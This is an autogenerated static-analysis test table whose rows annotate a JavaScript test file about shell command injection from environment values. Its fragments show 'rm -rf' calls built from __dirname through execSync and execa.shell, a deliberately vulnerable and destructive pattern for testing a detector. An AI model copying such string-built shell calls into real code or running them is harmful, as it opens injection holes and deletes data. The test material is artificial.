autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | exceptional return of require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | exceptional return of require("execa") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | require("execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | require("execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | require("execa") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:21:3:27 | "execa" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:21:3:27 | "execa" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:21:3:27 | "execa" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:21:3:27 | "execa" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:21:3:27 | "execa" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:21:3:27 | "execa" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:1:13:2 | (functi ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:1:13:2 | (functi ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:1:13:2 | (functi ... / OK\\n}) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | __dirname | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | __dirname | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | __dirname | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | cp | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | cp | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | execa | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | execa | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | execa | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | path | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | this | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:4:1 | this | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | 'arguments' object of anonymous function | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | exceptional return of anonymous function | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | exceptional return of anonymous function | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | functio ... // OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | functio ... // OK\\n} | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | return of anonymous function | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:4:2:13:1 | return of anonymous function | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:3 | cp | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:3 | cp | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:16 | cp.execFileSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:16 | cp.execFileSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:16 | cp.execFileSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:16 | cp.execFileSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:16 | cp.execFileSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | exceptional return of cp.exec ... emp")]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | exceptional return of cp.exec ... emp")]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | exceptional return of cp.exec ... emp")]) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | exceptional return of cp.exec ... emp")]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | exceptional return of cp.exec ... emp")]) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:5:5:16 | execFileSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:5:5:16 | execFileSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:5:5:16 | execFileSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:5:5:16 | execFileSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:5:5:16 | execFileSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:18:5:21 | 'rm' | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | CalleeFlexibleAccessPath | cp.execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:25:5:61 | ['-rf', ... temp")] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:26:5:30 | '-rf' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:36 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:36 | path | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:36 | path | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:36 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:36 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:41 | path.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:41 | path.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:41 | path.join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:41 | path.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:41 | path.join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | exceptional return of path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | exceptional return of path.jo ... "temp") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | exceptional return of path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | exceptional return of path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | exceptional return of path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:38:5:41 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:38:5:41 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:38:5:41 | join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| 